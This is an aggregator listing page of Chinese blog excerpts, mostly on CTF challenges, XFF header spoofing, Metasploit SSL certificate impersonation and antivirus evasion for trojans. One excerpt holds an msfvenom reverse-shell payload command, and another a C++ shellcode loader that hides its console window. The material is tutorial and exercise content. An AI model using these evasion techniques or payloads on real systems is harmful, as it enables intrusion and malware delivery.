ICode9

精准搜索请尝试: 精确搜索
  • [PWN]强网杯2022 house of cat2022-09-10 21:00:09

    IDA分析 一个初始化函数,然后进一个while循环,memset 一块空间往里面读入数据交给 sub_19D6 函数处理 初始化函数设置缓冲区,开了沙盒,然后把一个libc的地址存到bss段上,然后给变量 qword_4168 赋值为 64 sub_155E 函数把变量 qword_4168 的值64放到那个 libc 地址中 然后分配一块

  • 木马免杀2022-09-01 19:30:09

    最近学了点木马免杀,其实总结起来一共有三个层面,代码面,文件面,逻辑面。 代码层面可以通过shellcode编码混淆,编辑执行器,分离加载器等方法进行免杀 文件面可以通过特征码定位,加壳花指令等方式 逻辑面可以通过一些反vt虚拟机的方法进行免杀 下面先介绍一些语言的shellcode加载方式和一

  • 网络对抗实验三 免杀原理与实践2022-04-07 11:01:26

    基础知识问答 (1)杀软是如何检测出恶意代码的? ​ 1.基于特征码检测 ​ a.很多软件都会有各种特征码记成的特征库 ​ b.恶意软件的一个或几个片断就可作为识别依据。 ​ 2.也有启发式恶意软件的检测 ​ a.宁杀错不放过 ​ 3.基于行为的检测 (2)免杀是做什么? ​ 1.

  • XFF(X-FORWARDED-FOR)2022-02-03 19:30:48

      XFF(X-FORWARDED-FOR)是http的拓展头部,作用是使Web服务器获取访问用户的IP真实地址(可伪造)。由于很多用户通过代理服务器进行访问,服务器只能获取代理服务器的IP地址,而xff的作用在于记录用户的真实IP,以及代理服务器的IP。 格式: X-Forwarded-For: 本机IP, 代理1IP, 代理2IP,

  • HBase 热点问题——rowkey散列和预分区设计2022-01-26 17:07:12

    预分区背景 HBase默认建表时有一个region,这个region的rowkey是没有边界的,即没有startkey和endkey,在数据写入时,所有数据都会写入这个默认的region,随着数据量的不断增加,此region已经不能承受不断增长的数据量,会进行split,分成2个region。 在此过程中,会产生两个问题: 数据往一个re

  • CTF-PWN练习之绕过返回地址限制2022-01-06 10:04:58

    目录 预备知识一、相关实验二、__builtin_return_address函数三、理解多层跳转 实验目的实验环境实验步骤一源码审计 实验步骤二使用gdb调试程序 实验步骤三发起溢出攻击 预备知识 本实验要求实验者具备如下的相关知识。 一、相关实验 本实验要求您已经认真学习和完成了

  • 攻防世界 web xff_referer2021-12-02 19:59:13

    用burpsuite抓包发给重发器 先伪装X-Forworded-For:123.123.123.123 然后又要求来自google 伪装Referer:https://www.google.com    

  • [CISCN2019 华东南赛区]Web112021-11-20 09:03:27

    [CISCN2019 华东南赛区]Web11 打开环境,没看见什么输入框,但一眼就看到了XFF,然后右上角还有一个IP地址 和上次做的拼多多拿flag应该差不多,使用XFF就能绕过IP检测,先抓包。 IP可以随便改了,但好像没啥用,然后在页面底部发现一行字:Build With Smarty ! 然后去百度,发现这是一个PHP的模板

  • Hackergame 2021 - XFF伪造 [FLAG助力大红包]2021-11-03 15:59:36

    一、题目    高级黑pdd属于是,肯定不是让我们真正分享到朋友圈求着点,先看活动规则 只有这一条有用 二、解题 分析规则,我们初步猜测出这里会用的XFF伪造,而且每次都需要用不在同一/8网段的IP,像如下 68.38.64.1 和 67.38.64.1 才满足条件,百度了一下,IP地址分为A,B,C,D,E五类,常用

  • Bugku 本地管理员2021-10-24 21:30:33

    首先打开f12看一下源码,可以看到一串base64加密后的字符,解密看一下 尝试使用admin test123登录 发现ip已被记录,首先会想到referer和 X-Forwarded-For 两种区别参考 由于题目有提到联系管理员登陆,所以可以用xff伪造成本地ip登录 所以直接抓包修改xff头为本地IP 127.0.0.1就

  • web刷题总结(未完.......)2021-10-02 09:33:46

    总结 一、HTTP类 1. Referer HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer, 告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 2. X-Forwarded-For     当今多数缓存服务器的使用者为大型ISP,为了通过缓存的

  • 2021-09-24截图 照片二分类及判断截图原始性的一种方法2021-09-24 19:06:01

    import os   '''      Explainations:         root: path of the image folder         image_list: path of each image         images: name of each image         dirs: =images         target_info_seg:

  • 攻防世界-Web-新手-xff_referer2021-09-21 18:02:58

    【题目描述】 X老师告诉小宁其实xff和referer是可以伪造的。 【附件】 在线场景 【过程及思路】 打开在线场景后,出现如下提示: 服务器那边要求我们的原始ip是123.123.123.123,我们明显不是这么一个ip,怎么办呢? 题目告诉我们xff和referer可以伪造,那么什么是xff和referer呢?

  • 输入框限制输入20个中文字(40个字符)。eslint 报错\x00 no-control-regex解决2021-09-08 11:30:52

    需求是要限制用户输入的名称,最多二十个中文字,也就是40个字符。但我们平时使用str.length来限制都是获取到字符串的长度而已,并不能获取到具体的字符。这里使用正则来解决。 一个汉字=2字节=2字符 一个字母、数字=1字节=1字符 匹配单个字节 /[\x00-\xff]/ 取反,即是匹配多字符

  • xff_referer2021-07-25 14:01:34

    X老师告诉小宁其实xff和referer是可以伪造的 百度了一下伪造IP的方法:https://jingyan.baidu.com/article/ca41422fc5fd481eae99ed30.html 添加x-forward-for Header插件,修改IP 然后刷新 还需要伪造响应,使用burpsuit抓包从头来过,在原始中添加 X-Forwarded-For:123.123.123.123

  • 攻防世界-wp-WEB-新手区-9-xff_referer2021-07-19 16:59:37

    题目来源: Cyberpeace-n3k0 题目描述: X老师告诉小宁其实xff和referer是可以伪造的。 题目场景: 111.200.241.244:56031 题目思路: 本题是考察的HTTP头的伪装修改 X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,只有在通过了HTTP 代理或者负载均衡服务器时才

  • bugku的一道XFF转发代理服务器题 “本地服务器”2021-07-18 02:31:06

    X-Forwarded-For requests包内构造方式:   X-Forwarded-For: client1, proxy1, proxy2  

  • Metasploit 生成带SSL加密载荷2021-06-29 13:03:33

    1.下载证书。Impersonate_SSL模块,下载指定网站的证书。 msf6> use auxiliary/gather/impersonate_ssl msf6 auxiliary(gather/impersonate_ssl) > set rhost www.baidu.com msf6 auxiliary(gather/impersonate_ssl) > run 得到:/root/.msf4/loot/20210629003816_default_110.242.

  • 如何实时监测分析X-Forwarded-For伪造——其实就是看XFF和源IP是否存在多对一关系2021-04-25 20:33:23

    如何实时监测分析X-Forwarded-For伪造 2019 ,5月 8 | 网络分析, 网络安全分析 关键词:全流量分析、网络安全、X-Forwarded-For、HTTP协议分析 什么是X-Forwarded-For 如果要问当下最走红的应用层协议,当HTTP莫属,一个无状态维护协议,其连接基于TCP,在HTTP协议头部没有IP地

  • [NahamconCTF]wp2021-03-15 12:01:34

    Homeward Bound 添加一个xff头就得到了

  • msfvenom的使用与免杀2021-03-13 15:34:17

    msfvenom的基本使用 这玩意是啥我就不介绍了,懂得都懂. 这篇博客将结合我本人的自身经验来说明大致的使用方式,这里的话只介绍,目前比较常用的几个方法和参数. payload 查看与使用 payload你可以理解为就是一种攻击的方案,生成何种攻击方式,对那种平台进行攻击 使用参数 -p来

  • 【Windows】Shellcode免杀,过360、火绒、Defender 静态及主防2021-02-17 11:05:16

    Shellcode,顾名思义是一段拿来执行的代码片段,我们可以使用Shellcode来完成我们需要的任务 弹窗的代码,可以被认为是一段Shellcode,获取某个模块的基址的代码,也可以被认为是一段Shellcode,同理,拿来干坏事的代码,也是Shellcode 如今的杀毒软件都拥有查杀病毒木马的能力,除了静态的查

  • C++之加载器编写(二)2021-02-12 12:35:57

    #include <Windows.h> #include <stdio.h> using namespace std; #pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") int main(int argc, char **argv) { DWORD dwOldProtect; //自己定义个内存的属性页

  • 将shellcode注入本地进程2021-02-04 14:04:40

    这次我们来学习一下将shellcode注入本地进程内存并切执行的经典方法 首先生成我们的shellcode msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.104 LPORT=443 -f c -b \x00\x0a\x0d   root@kali:~# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.

  • 视频识别函数##2020-12-14 22:02:09

    视频识别函数## #!/usr/bin/env python # encoding: utf-8 # author: zs # license: (C) Copyright 2019-2020 # software: pycharm # file: HDliveObjDetection.py # time: 2020/4/10 下午4:16 import cv2 import time import requests import base64 from PIL import Imag

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有